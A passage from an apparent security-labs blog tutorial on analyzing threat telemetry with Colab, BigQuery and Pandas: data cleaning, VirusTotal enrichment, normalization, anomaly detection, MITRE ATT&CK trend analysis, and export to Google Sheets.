<td><a href="https://cloud.google.com/python/docs/reference/bigquery/latest">google.colab.auth</a></td>
<td>Provides authentication for accessing Google Cloud services within Google Colab notebooks, enabling a secure connection to your cloud-based resources.</td>
</tr>
<tr>
<td><a href="https://cloud.google.com/python/docs/reference/bigquery/latest">google.cloud.bigquery</a></td>
<td>A tool for managing large datasets in Google Cloud's BigQuery service. It allows for efficient processing and analysis of massive amounts of data.</td>
</tr>
<tr>
<td><a href="https://cloud.google.com/python/docs/reference/storage/latest">google.cloud.storage</a></td>
<td>Used for storing and retrieving data in Google Cloud Storage. It's an ideal solution for handling various data files in the cloud.</td>
</tr>
<tr>
<td><a href="https://docs.gspread.org/en/latest/">gspread</a></td>
<td>Facilitates interaction with Google Spreadsheets, allowing for easy manipulation and analysis of spreadsheet data.</td>
</tr>
<tr>
<td><a href="https://pypi.org/project/gspread-dataframe/">gspread.dataframe</a>.set_with_dataframe</td>
<td>Syncs data between Pandas dataframes and Google Spreadsheets, enabling seamless data transfer and updating between these formats.</td>
</tr>
<tr>
<td><a href="https://pypi.org/project/matplotlib/">matplotlib</a>.pyplot.plt</td>
<td>A module in Matplotlib library for creating charts and graphs. It helps in visualizing data in a graphical format, making it easier to understand patterns and trends.</td>
</tr>
<tr>
<td><a href="https://pandas.pydata.org/">pandas</a></td>
<td>A fundamental tool for data manipulation and analysis in Python. It offers data structures and operations for manipulating numerical tables and time series.</td>
</tr>
<tr>
<td><a href="https://pypi.org/project/pandas-gbq/">pandas.gbq</a>.to_gbq</td>
<td>Enables the transfer of data from Pandas dataframes directly into Google BigQuery, streamlining the process of moving data into this cloud-based analytics platform.</td>
</tr>
<tr>
<td><a href="https://arrow.apache.org/docs/python/index.html">pyarrow</a>.parquet.pq</td>
<td>Allows for efficient storage and retrieval of data in the Parquet format, a columnar storage file format optimized for use with large datasets.</td>
</tr>
<tr>
<td><a href="https://seaborn.pydata.org/">seaborn</a></td>
<td>A Python visualization library based on Matplotlib that provides a high-level interface for drawing attractive and informative statistical graphics.</td>
</tr>
</tbody>
</table>
<p>Next, we authenticate with BigQuery, and receive authorization to access our datasets as demonstrated earlier. By using Google Workspace credentials, we can easily access BigQuery and other Google Cloud services. The process typically involves a simple code snippet for authentication:</p>
<pre><code>from google.colab import auth
from google.cloud import bigquery

auth.authenticate_user()
project_id = &quot;PROJECT_FROM_GCP&quot;
client = bigquery.Client(project=project_id)
</code></pre>
<p>With authentication complete, we can then proceed to access and manipulate our data. Google Colab's integration with Google Cloud services simplifies this process, making it efficient and secure.</p>
<h2>Organizing Colab Notebooks before analysis</h2>
<p>When working with Jupyter Notebooks, it's better to organize your notebook beforehand. Various stages of handling and manipulating data will be required, and staying organized will help you create a repeatable, comprehensive process.</p>
<p>In our notebooks, we use Jupyter Notebook headers to organize the code systematically. This structure allows for clear compartmentalization and the creation of collapsible sections, which is especially beneficial when dealing with complex data operations that require multiple steps. This methodical organization aids in navigating the notebook efficiently, ensuring that each step in the data extraction and analysis process is easily accessible and manageable.</p>
<p>Moreover, while the workflow in a notebook might seem linear, it's often more dynamic. Data analysts frequently engage in multitasking, jumping between different sections as needed based on the data or results they encounter. Furthermore, new insights discovered in one step may influence another step’s process, leading to some back and forth before finishing the notebook.
| <img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image3.png" alt="" /></p>
<h2>Extracting Our BigQuery datasets into dataframes</h2>
<p>After establishing the structure of our notebook and successfully authenticating with BigQuery, our next step is to retrieve the required datasets. This process sets the foundation for the rest of the report, as the information from these sources will form the basis of our analysis, similar to selecting the key components required for a comprehensive study.</p>
<p>Here's an example of how we might fetch data from BigQuery:</p>
<pre><code>import datetime

current_year = datetime.datetime.now().year
reb_dataset_id = f'project.global_threat_report.{current_year}_raw_ep_behavior'
reb_table = client.list_rows(reb_dataset_id)
reb_df = reb_table.to_dataframe() 
</code></pre>
<p>This snippet demonstrates a typical data retrieval process. We first define the dataset we're interested in (with the Global Threat Report, <code>project.global_threat_report.ep_behavior_raw</code> for the current year). Then, we use a BigQuery query to select the data from this dataset and load it into a Pandas DataFrame. This DataFrame will serve as the foundation for our subsequent data analysis steps.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image4.png" alt="Colab Notebook snippet for data extraction from BigQuery into Pandas dataframe" />
Colab Notebook snippet for data extraction from BigQuery into Pandas dataframe</p>
<p>This process marks the completion of the extraction phase. We have successfully navigated BigQuery to select and retrieve the necessary datasets and load them in our notebooks within dataframes. The extraction phase is pivotal, as it not only involves gathering the data but also setting up the foundation for deeper analysis. It's the initial step in a larger journey of discovery, leading to the transformation phase, where we will uncover more detailed insights from the data.</p>
<p>In summary, this part of our data journey is about more than just collecting datasets; it's about structurally preparing them for the in-depth analysis that follows. This meticulous approach to organizing and executing the extraction phase sets the stage for the transformative insights that we aim to derive in the subsequent stages of our data analysis.</p>
<h1>Pre-processing and transformation: The critical phase of data analysis</h1>
<p>The transition from raw data to actionable insights involves a series of crucial steps in data processing. After extracting data, our focus shifts to refining it for analysis. Cybersecurity datasets often include various forms of noise, such as false positives and anomalies, which must be addressed to ensure accurate and relevant analysis.</p>
<p>Key stages in data pre-processing and transformation:</p>
<ul>
<li><strong>Data cleaning:</strong> This stage involves filling NULL values, correcting data misalignments, and validating data types to ensure the dataset's integrity.</li>
<li><strong>Data enrichment:</strong> In this step, additional context is added to the dataset. For example, incorporating third-party data, like malware reputations from sources such as VirusTotal, enhances the depth of analysis.</li>
<li><strong>Normalization:</strong> This process standardizes the data to ensure consistency, which is particularly important for varied datasets like endpoint malware alerts.</li>
<li><strong>Anomaly detection:</strong> Identifying and rectifying outliers or false positives is critical to maintain the accuracy of the dataset.</li>
<li><strong>Feature extraction:</strong> The process of identifying meaningful, consistent data points that can be further extracted for analysis.</li>
</ul>
<h2>Embracing the art of data cleaning</h2>
<p>Data cleaning is a fundamental step in preparing datasets for comprehensive analysis, especially in cybersecurity. This process involves a series of technical checks to ensure data integrity and reliability. Here are the specific steps:</p>
<ul>
<li>
<p><strong>Mapping to MITRE ATT&amp;CK framework:</strong> Verify that all detection and response rules in the dataset are accurately mapped to the corresponding tactics and techniques in the MITRE ATT&amp;CK framework. This check includes looking for NULL values or any inconsistencies in how the data aligns with the framework.</p>
</li>
<li>
<p><strong>Data type validation:</strong> Confirm that the data types within the dataset are appropriate and consistent. For example, timestamps should be in a standardized datetime format. This step may involve converting string formats to datetime objects or verifying that numerical values are in the correct format.</p>
</li>
<li>
<p><strong>Completeness of critical data:</strong> Ensure that no vital information is missing from the dataset. This includes checking for the presence of essential elements like SHA256 hashes or executable names in endpoint behavior logs. The absence of such data can lead to incomplete or biased analysis.</p>
</li>
<li>
<p><strong>Standardization across data formats:</strong> Assess and implement standardization of data formats across the dataset to ensure uniformity. This might involve normalizing text formats, ensuring consistent capitalization, or standardizing date and time representations.</p>
</li>
<li>
<p><strong>Duplicate entry identification:</strong> Identify and remove duplicate entries by examining unique identifiers such as XDR agent IDs or cluster IDs. This process might involve using functions to detect and remove duplicates, ensuring the uniqueness of each data entry.</p>
</li>
<li>
<p><strong>Exclusion of irrelevant internal data:</strong> Locate and remove any internal data that might have inadvertently been included in the dataset. This step is crucial to prevent internal biases or irrelevant information from affecting the analysis.</p>
</li>
</ul>
<p>It is important to note that data cleaning or “scrubbing the data” is a continuous effort throughout our workflow. As we continue to peel back the layers of our data and wrangle it for various insights, it is expected that we identify additional changes.</p>
<h2>Utilizing Pandas for data cleaning</h2>
<p>The <a href="https://pandas.pydata.org/about/">Pandas</a> library in Python offers several functionalities that are particularly useful for data cleaning in cybersecurity contexts. Some of these methods include:</p>
<ul>
<li><code>DataFrame.isnull()</code> or <code>DataFrame.notnull()</code> to identify missing values.</li>
<li><code>DataFrame.drop_duplicates()</code> to remove duplicate rows.</li>
<li>Data type conversion methods like <code>pd.to_datetime()</code> for standardizing timestamp formats.</li>
<li>Utilizing boolean indexing to filter out irrelevant data based on specific criteria.</li>
</ul>
<p>A thorough understanding of the dataset is essential to determine the right cleaning methods. It may be necessary to explore the dataset preliminarily to identify specific areas requiring cleaning or transformation. Additional helpful methods and workflows can be found listed in <a href="https://realpython.com/python-data-cleaning-numpy-pandas/">this</a> Real Python blog.</p>
<h2>Feature extraction and enrichment</h2>
<p>Feature extraction and enrichment are core steps in data analysis, particularly in the context of cybersecurity. These processes involve transforming and augmenting the dataset to enhance its usefulness for analysis.</p>
<ul>
<li><strong>Create new data from existing:</strong> This is where we modify or use existing data to add additional columns or rows.</li>
<li><strong>Add new data from 3rd-party:</strong> Here, we use existing data as a query reference for 3rd-party RESTful APIs which respond with additional data we can add to the datasets.</li>
</ul>
<h2>Feature extraction</h2>
<p>Let’s dig into a tangible example. Imagine we're presented with a bounty of publicly available YARA signatures that Elastic <a href="https://github.com/elastic/protections-artifacts/tree/main/yara/rules">shares</a> with its community. These signatures trigger some of the endpoint malware alerts in our dataset. A consistent naming convention has been observed based on the rule name that, of course, shows up in the raw data: <code>OperationsSystem_MalwareCategory_MalwareFamily</code>. These names can be deconstructed to provide more specific insights. Leveraging Pandas, we can expertly slice and dice the data. For those who prefer doing this during the dataset staging phase with BigQuery, the combination of <a href="https://cloud.google.com/bigquery/docs/reference/standard-sql/string_functions#split">SPLIT</a> and <a href="https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators#offset_and_ordinal">OFFSET</a> clauses can yield similar results:</p>
<pre><code>df[['OperatingSystem', 'MalwareCategory', 'MalwareFamily']] = df['yara_rule_name'].str.split('_', expand=True)
</code></pre>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image2.png" alt="Feature extraction with our YARA data" />
Feature extraction with our YARA data</p>
<p>There are additional approaches, methods, and processes to feature extraction in data analysis. We recommend consulting your stakeholder's wants/needs and exploring your data to help determine what is necessary for extraction and how.</p>
<h2>Data enrichment</h2>
<p>Data enrichment enhances the depth and context of cybersecurity datasets. One effective approach involves integrating external data sources to provide additional perspectives on the existing data. This can be particularly valuable in understanding and interpreting cybersecurity alerts.</p>
<p><strong>Example of data enrichment: Integrating VirusTotal reputation data</strong>
A common method of data enrichment in cybersecurity involves incorporating reputation scores from external threat intelligence services like <a href="https://www.virustotal.com/gui/home/search">VirusTotal</a> (VT). This process typically includes:</p>
<ol>
<li><strong>Fetching reputation data:</strong> Using an API key from VT, we can query for reputational data based on unique identifiers in our dataset, such as SHA256 hashes of binaries.</li>
</ol>
<pre><code>import requests

def get_reputation(sha256, API_KEY, URL):
    params = {'apikey': API_KEY, 'resource': sha256}
    response = requests.get(URL, params=params)
    json_response = response.json()
    
    if json_response.get(&quot;response_code&quot;) == 1:
        positives = json_response.get(&quot;positives&quot;, 0)
        return classify_positives(positives)
    else:
        return &quot;unknown&quot;
</code></pre>
<p>In this function, <code>classify_positives</code> is a custom function that classifies the reputation based on the number of antivirus engines that flagged the file as malicious.</p>
<ol start="2">
<li><strong>Adding reputation data to the dataset:</strong> The reputation data fetched from VirusTotal is then integrated into the existing dataset. This is done by applying the <code>get_reputation</code> function to each relevant entry in the DataFrame.</li>
</ol>
<pre><code>df['reputation'] = df['sha256'].apply(lambda x: get_reputation(x, API_KEY, URL))

</code></pre>
<p>Here, a new column named <code>reputation</code> is added to the dataframe, providing an additional layer of information about each binary based on its detection rate in VirusTotal.</p>
<p>This method of data enrichment is just one of many options available for enhancing cybersecurity threat data. By utilizing robust helper functions and tapping into external data repositories, analysts can significantly enrich their datasets. This enrichment allows for a more comprehensive understanding of the data, leading to a more informed and nuanced analysis. The techniques demonstrated here are part of a broader range of advanced data manipulation methods that can further refine cybersecurity data analysis.</p>
<h2>Normalization</h2>
<p>Especially when dealing with varied datasets in cybersecurity, such as endpoint alerts and cloud SIEM notifications, normalization may be required to get the most out of your data.</p>
<p><strong>Understanding normalization:</strong> At its core, normalization is about adjusting values measured on different scales to a common scale, ensuring that they are proportionally represented, and reducing redundancy. In the cybersecurity context, this means representing events or alerts in a manner that doesn't unintentionally amplify or reduce their significance.</p>
<p>Consider our endpoint malware dataset. When analyzing trends, say, infections based on malware families or categories, we aim for an accurate representation. However, a single malware infection on an endpoint could generate multiple alerts depending on the Extended Detection and Response (XDR) system. If left unchecked, this could significantly skew our understanding of the threat landscape. To counteract this, we consider the Elastic agents, which are deployed as part of the XDR solution. Each endpoint has a unique agent, representing a single infection instance if malware is detected. Therefore, to normalize this dataset, we would &quot;flatten&quot; or adjust it based on unique agent IDs. This means, for our analysis, we'd consider the number of unique agent IDs affected by a specific malware family or category rather than the raw number of alerts.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image6.png" alt="Example visualization of malware alert normalization by unique agents" />
Example visualization of malware alert normalization by unique agents</p>
<p>As depicted in the image above, if we chose to not normalize the malware data in preparation for trend analysis, our key findings would depict inaccurate information. This inaccuracy could be sourced from a plethora of data inconsistencies such as generic YARA rules, programmatic operations that were flagged repeatedly on a single endpoint, and many more.</p>
<p><strong>Diversifying the approach:</strong> On the other hand, when dealing with endpoint behavior alerts or cloud alerts (from platforms like AWS, GCP, Azure, Google Workspace, and O365), our normalization approach might differ. These datasets could have their own nuances and may not require the same &quot;flattening&quot; technique used for malware alerts.</p>
<p><strong>Conceptualizing normalization options:</strong> Remember the goal of normalization is to reduce redundancy in your data. Make sure to keep your operations as atomic as possible in case you need to go back and tweak them later. This is especially true when performing both normalization and standardization. Sometimes these can be difficult to separate, and you may have to go back and forth between the two. Analysts have a wealth of options for these. From <a href="https://www.geeksforgeeks.org/data-pre-processing-wit-sklearn-using-standard-and-minmax-scaler/">Min-Max</a> scaling, where values are shifted and rescaled to range between 0 and 1, to <a href="https://www.statology.org/z-score-python/">Z-score</a> normalization (or standardization), where values are centered around zero and standard deviations from the mean. The choice of technique depends on the nature of the data and the specific requirements of the analysis.</p>
<p>In essence, normalization ensures that our cybersecurity analysis is based on a level playing field, giving stakeholders an accurate view of the threat environment without undue distortions. This is a critical step before trend analysis.</p>
<h2>Anomaly detection: Refining the process of data analysis</h2>
<p>In the realm of cybersecurity analytics, a one-size-fits-all approach to anomaly detection does not exist. The process is highly dependent on the specific characteristics of the data at hand. The primary goal is to identify and address outliers that could potentially distort the analysis. This requires a dynamic and adaptable methodology, where understanding the nuances of the dataset is crucial.</p>
<p>Anomaly detection in cybersecurity involves exploring various techniques and methodologies, each suited to different types of data irregularities. The strategy is not to rigidly apply a single method but rather to use a deep understanding of the data to select the most appropriate technique for each situation. The emphasis is on flexibility and adaptability, ensuring that the approach chosen provides the clearest and most accurate insights into the data.</p>
<h3>Statistical methods – The backbone of analysis:</h3>
<p>Statistical analysis is always an optional approach to anomaly detection, especially for cyber security data. By understanding the inherent distribution and central tendencies of our data, we can highlight values that deviate from the norm. A simple yet powerful method, the Z-score, gauges the distance of a data point from the mean in terms of standard deviations.</p>
<pre><code>import numpy as np

# Derive Z-scores for data points in a feature
z_scores = np.abs((df['mitre_technique'] - df['mitre_technique'].mean()) / df['mitre_technique'].std())

outliers = df[z_scores &gt; 3]  # Conventionally, a Z-score above 3 signals an outlier
</code></pre>
<p><strong>Why this matters:</strong> This method allows us to quantitatively gauge the significance of a data point's deviation. Such outliers can heavily skew aggregate metrics like mean or even influence machine learning model training detrimentally. Remember, outliers should not always be removed; it is all about context! Sometimes you may even be looking for the outliers specifically.</p>
<p><strong>Key library:</strong> While we utilize <a href="https://numpy.org/">NumPy</a> above, <a href="https://scipy.org/">SciPy</a> can also be employed for intricate statistical operations.</p>
<h2>Aggregations and sorting – unraveling layers:</h2>
<p>Data often presents itself in layers. By starting with a high-level view and gradually diving into specifics, we can locate inconsistencies or anomalies. When we aggregate by categories such as the MITRE ATT&amp;CK tactic, and then delve deeper, we gradually uncover the finer details and potential anomalies as we go from technique to rule logic and alert context.</p>
<pre><code># Aggregating by tactics first
tactic_agg = df.groupby('mitre_tactic').size().sort_values(ascending=False)
</code></pre>
<p>From here, we can identify the most common tactics and choose the tactic with the highest count. We then filter our data for this tactic to identify the most common technique associated with the most common tactic. Techniques often are more specific than tactics and thus add more explanation about what we may be observing. Following the same approach we can then filter for this specific technique, aggregate by rule and review that detection rule for more context. The goal here is to find “noisy” rules that may be skewing our dataset and thus related alerts need to be removed. This cycle can be repeated until outliers are removed and the percentages appear more accurate.</p>
<p><strong>Why this matters:</strong> This layered analysis approach ensures no stone is left unturned. By navigating from the general to the specific, we systematically weed out inconsistencies.</p>
<p><strong>Key library:</strong> Pandas remains the hero, equipped to handle data-wrangling chores with finesse.</p>
<h3>Visualization – The lens of clarity:</h3>
<p>Sometimes, the human eye, when aided with the right visual representation, can intuitively detect what even the most complex algorithms might miss. A boxplot, for instance, not only shows the central tendency and spread of data but distinctly marks outliers.</p>
<pre><code>import seaborn as sns
import matplotlib.pyplot as plt

plt.figure(figsize=(12, 8))
sns.boxplot(x='Malware Family', y='Malware Score', data=df)
plt.title('Distribution of Malware Scores by Family')
plt.show()
</code></pre>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image10.png" alt="Example visualization of malware distribution scores by family from an example dataset" />
Example visualization of malware distribution scores by family from an example dataset</p>
<p><strong>Why this matters:</strong> Visualization transforms abstract data into tangible insights. It offers a perspective that's both holistic and granular, depending on the need.</p>
<p><strong>Key library:</strong> Seaborn, built atop Matplotlib, excels at turning data into visual stories.</p>
<h3>Machine learning – The advanced guard:</h3>
<p>When traditional methods are insufficient, machine learning steps in, offering a predictive lens to anomalies. While many algorithms are designed to classify known patterns, some, like autoencoders in deep learning, learn to recreate 'normal' data, marking any deviation as an anomaly.</p>
<p><strong>Why this matters:</strong> As data complexity grows, the boundaries of what constitutes an anomaly become blurrier. Machine learning offers adaptive solutions that evolve with the data.</p>
<p><strong>Key libraries:</strong> <a href="https://scikit-learn.org/stable/">Scikit-learn</a> is a treasure trove for user-friendly, classical machine learning techniques, while <a href="https://pytorch.org/">PyTorch</a> brings the power of deep learning to the table.</p>
<p>Perfecting anomaly detection in data analysis is similar to refining a complex skill through practice and iteration. The process often involves trial and error, with each iteration enhancing the analyst's familiarity with the dataset. This progressive understanding is key to ensuring that the final analysis is both robust and insightful. In data analysis, the journey of exploration and refinement is as valuable as the final outcome itself.</p>
<p>Before proceeding to in-depth trend analysis, it's very important to ensure that the data is thoroughly pre-processed and transformed. Just as precision and reliability are essential in any meticulous task, they are equally critical in data analysis. The steps of cleaning, normalizing, enriching, and removing anomalies from the groundwork for deriving meaningful insights. Without these careful preparations, the analysis could range from slightly inaccurate to significantly misleading. It's only when the data is properly refined and free of distortions that it can reveal its true value, leading to reliable and actionable insights in trend analysis.</p>
<h1>Trend analysis: Unveiling patterns in data</h1>
<p>In the dynamic field of cybersecurity where threat actors continually evolve their tactics, techniques, and procedures (TTPs), staying ahead of emerging threats is critical. Trend analysis serves as a vital tool in this regard, offering a way to identify and understand patterns and behaviors in cyber threats over time.</p>
<p>By utilizing the MITRE ATT&amp;CK framework, cybersecurity professionals have a structured and standardized approach to analyzing and categorizing these evolving threats. This framework aids in systematically identifying patterns in attack methodologies, enabling defenders to anticipate and respond to changes in adversary behaviors effectively.</p>
<p>Trend analysis, through the lens of the MITRE ATT&amp;CK framework, transforms raw cybersecurity telemetry into actionable intelligence. It allows analysts to track the evolution of attack strategies and to adapt their defense mechanisms accordingly, ensuring a proactive stance in cybersecurity management.</p>
<h2>Beginning with a broad overview: Aggregation and sorting</h2>
<p>Commencing our analysis with a bird's eye view is paramount. This panoramic perspective allows us to first pinpoint the broader tactics in play before delving into the more granular techniques and underlying detection rules.</p>
<p><strong>Top tactics:</strong> By aggregating our data based on MITRE ATT&amp;CK tactics, we can discern the overarching strategies adversaries lean toward. This paints a picture of their primary objectives, be it initial access, execution, or exfiltration.</p>
<pre><code>top_tactics = df.groupby('mitre_tactic').size()
 .sort_values(ascending=False)
</code></pre>
<p><strong>Zooming into techniques:</strong> Once we've identified a prominent tactic, we can then funnel our attention to the techniques linked to that tactic. This reveals the specific modus operandi of adversaries.</p>
<pre><code>chosen_tactic = 'Execution'

techniques_under_tactic = df[df['mitre_tactic'] == chosen_tactic]
top_techniques = techniques_under_tactic.groupby('mitre_technique').size()
 .sort_values(ascending=False)
</code></pre>
<p><strong>Detection rules and logic:</strong> With our spotlight on a specific technique, it's time to delve deeper, identifying the detection rules that triggered alerts. This not only showcases what was detected, but by reviewing the detection logic, we also gain an understanding of the precise behaviors and patterns that were flagged.</p>
<pre><code>chosen_technique = 'Scripting'

rules_for_technique = techniques_under_tactic[techniques_under_tactic['mitre_technique'] == chosen_technique]

top_rules = rules_for_technique
 .groupby('detection_rule').size().sort_values(ascending=False)
</code></pre>
<p>This hierarchical, cascading approach is akin to peeling an onion. With each layer, we expose more intricate details, refining our perspective and sharpening our insights.</p>
<h2>The power of time: Time series analysis</h2>
<p>In the realm of cybersecurity, time isn't just a metric; it's a narrative. Timestamps, often overlooked, are goldmines of insights. Time series analysis allows us to plot events over time, revealing patterns, spikes, or lulls that might be indicative of adversary campaigns, specific attack waves, or dormancy periods.</p>
<p>For instance, plotting endpoint malware alerts over time can unveil an adversary's operational hours or spotlight a synchronized, multi-vector attack:</p>
<pre><code>import matplotlib.pyplot as plt

# Extract and plot endpoint alerts over time
df.set_index('timestamp')['endpoint_alert'].resample('D').count().plot()
plt.title('Endpoint Malware Alerts Over Time')
plt.xlabel('Time')
plt.ylabel('Alert Count')
plt.show()
</code></pre>
<p>Time series analysis doesn't just highlight &quot;when&quot; but often provides insights into the &quot;why&quot; behind certain spikes or anomalies. It aids in correlating external events (like the release of a new exploit) to internal data trends.</p>
<h2>Correlation analysis</h2>
<p>Understanding relationships between different sets of data can offer valuable insights. For instance, a spike in one type of alert could correlate with another type of activity in the system, shedding light on multi-stage attack campaigns or diversion strategies.</p>
<pre><code># Finding correlation between an increase in login attempts and data exfiltration activities
correlation_value = df['login_attempts'].corr(df['data_exfil_activity'])
</code></pre>
<p>This analysis, with the help of pandas <a href="https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.corr.html">corr</a>, can help in discerning whether multiple seemingly isolated activities are part of a coordinated attack chain.</p>
<p>Correlation also does not have to be metric-driven either. When analyzing threats, it is easy to find value and new insights by comparing older findings to the new ones.</p>
<h2>Machine learning &amp; anomaly detection</h2>
<p>With the vast volume of data, manual analysis becomes impractical. Machine learning can assist in identifying patterns and anomalies that might escape the human eye. Algorithms like <a href="https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.IsolationForest.html">Isolation Forest</a> or <a href="https://scikit-learn.org/stable/modules/neighbors.html">K-nearest neighbor</a>(KNN) are commonly used to spot deviations or clusters of commonly related data.</p>
<pre><code>from sklearn.ensemble import IsolationForest

# Assuming 'feature_set' contains relevant metrics for analysis
clf = IsolationForest(contamination=0.05)
anomalies = clf.fit_predict(feature_set)
</code></pre>
<p>Here, the anomalies variable will flag data points that deviate from the norm, helping analysts pinpoint unusual behavior swiftly.</p>
<h2>Behavioral patterns &amp; endpoint data analysis</h2>
<p>Analyzing endpoint behavioral data collected from detection rules allows us to unearth overarching patterns and trends that can be indicative of broader threat landscapes, cyber campaigns, or evolving attacker TTPs.</p>
<p><strong>Tactic progression patterns:</strong> By monitoring the sequence of detected behaviors over time, we can spot patterns in how adversaries move through their attack chain. For instance, if there's a consistent trend where initial access techniques are followed by execution and then lateral movement, it's indicative of a common attacker playbook being employed.</p>
<p><strong>Command-line trend analysis:</strong> Even within malicious command-line arguments, certain patterns or sequences can emerge. Monitoring the most frequently detected malicious arguments can give insights into favored attack tools or scripts.</p>
<p>Example:</p>
<pre><code># Most frequently detected malicious command lines
top_malicious_commands = df.groupby('malicious_command_line').size()
 .sort_values(ascending=False).head(10)
</code></pre>
<p><strong>Process interaction trends:</strong> While individual parent-child process relationships can be malicious, spotting trends in these interactions can hint at widespread malware campaigns or attacker TTPs. For instance, if a large subset of endpoints is showing the same unusual process interaction, it might suggest a common threat.</p>
<p><strong>Temporal behavior patterns:</strong> Just as with other types of data, the temporal aspect of endpoint behavioral data can be enlightening. Analyzing the frequency and timing of certain malicious behaviors can hint at attacker operational hours or campaign durations.</p>
<p>Example:</p>
<pre><code># Analyzing frequency of a specific malicious behavior over time
monthly_data = df.pivot_table(index='timestamp', columns='tactic', values='count', aggfunc='sum').resample('M').sum()

ax = monthly_data[['execution', 'defense-evasion']].plot(kind='bar', stacked=False, figsize=(12,6))

plt.title(&quot;Frequency of 'execution' and 'defense-evasion' Tactics Over Time&quot;)

plt.ylabel(&quot;Count&quot;)
ax.set_xticklabels([x.strftime('%B-%Y') for x in monthly_data.index])
plt.xticks(rotation=45)
plt.tight_layout()
plt.show()
</code></pre>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image11.png" alt="Note: This image is from example data and not from the Global Threat Report" />
Note: This image is from example data and not from the Global Threat Report</p>
<p>By aggregating and analyzing endpoint behavioral data at a macro level, we don't just identify isolated threats but can spot waves, trends, and emerging patterns. This broader perspective empowers cybersecurity teams to anticipate, prepare for, and counter large-scale cyber threats more effectively.</p>
<p>While these are some examples of how to perform trend analysis, there is no right or wrong approach. Every analyst has their own preference or set of questions they or stakeholders may want to ask. Here are some additional questions or queries analysts may have for cybersecurity data when doing trend analysis.</p>
<ul>
<li>What are the top three tactics being leveraged by adversaries this quarter?</li>
<li>Which detection rules are triggering the most, and is there a common thread?</li>
<li>Are there any time-based patterns in endpoint alerts, possibly hinting at an adversary's timezone?</li>
<li>How have cloud alerts evolved with the migration of more services to the cloud?</li>
<li>Which malware families are becoming more prevalent, and what might be the cause?</li>
<li>Do the data patterns suggest any seasonality, like increased activities towards year-end?</li>
<li>Are there correlations between external events and spikes in cyber activities?</li>
<li>How does the weekday data differ from weekends in terms of alerts and attacks?</li>
<li>Which organizational assets are most targeted, and are their defenses up-to-date?</li>
<li>Are there any signs of internal threats or unusual behaviors among privileged accounts?</li>
</ul>
<p>Trend analysis in cybersecurity is a dynamic process. While we've laid down some foundational techniques and questions, there are myriad ways to approach this vast domain. Each analyst may have their preferences, tools, and methodologies, and that's perfectly fine. The essence lies in continuously evolving and adapting to our approach while cognizantly being aware of the ever-changing threat landscape for each ecosystem exposed to threats.</p>
<h1>Reduction: Streamlining for clarity</h1>
<p>Having progressed through the initial stages of our data analysis, we now enter the next phase: reduction. This step is about refining and concentrating our comprehensive data into a more digestible and focused format.</p>
<p>Recap of the Analysis Journey So Far:</p>
<ul>
<li><strong>Extraction:</strong> The initial phase involved setting up our Google Cloud environment and selecting relevant datasets for our analysis.</li>
<li><strong>Pre-processing and transformation:</strong> At this stage, the data was extracted, processed, and transformed within our Colab notebooks, preparing it for detailed analysis.</li>
<li><strong>Trend analysis:</strong> This phase provided in-depth insights into cyber attack tactics, techniques, and malware, forming the core of our analysis.</li>
</ul>
<p>While the detailed data in our Colab Notebooks is extensive and informative for an analyst, it might be too complex for a broader audience. Therefore, the reduction phase focuses on distilling this information into a more concise and accessible form. The aim is to make the findings clear and understandable, ensuring that they can be effectively communicated and utilized across various departments or stakeholders.</p>
<h2>Selecting and aggregating key data points</h2>
<p>In order to effectively communicate our findings, we must tailor the presentation to the audience's needs. Not every stakeholder requires the full depth of collected data; many prefer a summarized version that highlights the most actionable points. This is where data selection and aggregation come into play, focusing on the most vital elements and presenting them in an accessible format.</p>
<p>Here's an example of how to use Pandas to aggregate and condense a dataset, focusing on key aspects of endpoint behavior:</p>
<pre><code>required_endpoint_behavior_cols = ['rule_name','host_os_type','tactic_name','technique_name']


reduced_behavior_df = df.groupby(required_endpoint_behavior_cols).size()
 .reset_index(name='count')
 .sort_values(by=&quot;count&quot;, ascending=False)
 .reset_index(drop=True)

columns = {
    'rule_name': 'Rule Name', 
    'host_os_type': 'Host OS Type',
    'tactic_name': 'Tactic', 
    'technique_name': 'Technique', 
    'count': 'Alerts'
}

reduced_behavior_df = reduced_behavior_df.rename(columns=columns)
</code></pre>
<p>One remarkable aspect of this code and process is the flexibility it offers. For instance, we can group our data by various data points tailored to our needs. Interested in identifying popular tactics used by adversaries? Group by the MITRE ATT&amp;CK tactic. Want to shed light on masquerading malicious binaries? Revisit extraction to add more Elastic Common Schema (ECS) fields such as file path, filter on Defense Evasion, and aggregate to reveal the commonly trodden paths. This approach ensures we create datasets that are both enlightening and not overwhelmingly rich, tailor-made for stakeholders who wish to understand the origins of our analysis.</p>
<p>This process involves grouping the data by relevant categories such as rule name, host OS type, and MITRE ATT&amp;CK tactics and techniques and then counting the occurrences. This method helps in identifying the most prevalent patterns and trends in the data.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image5.png" alt="Diagram example of data aggregation to obtain reduced dataset" />
Diagram example of data aggregation to obtain reduced dataset</p>
<h2>Exporting reduced data to Google Sheets for accessibility</h2>
<p>The reduced data, now stored as a dataframe in memory, is ready to be exported. We use Google Sheets as the platform for sharing these insights because of its wide accessibility and user-friendly interface. The process of exporting data to Google Sheets is straightforward and efficient, thanks to the integration with Google Cloud services.</p>
<p>Here's an example of how the data can be uploaded to Google Sheets using Python from our Colab notebook:</p>
<pre><code>auth.authenticate_user()
credentials, project = google.auth.default()
gc = gspread.authorize(credentials)
workbook = gc.open_by_key(&quot;SHEET_ID&quot;)
behavior_sheet_name = 'NAME_OF_TARGET_SHEET'
endpoint_behavior_worksheet = workbook.worksheet(behavior_sheet_name)
set_with_dataframe(endpoint_behavior_worksheet, reduced_behavior_df)
</code></pre>
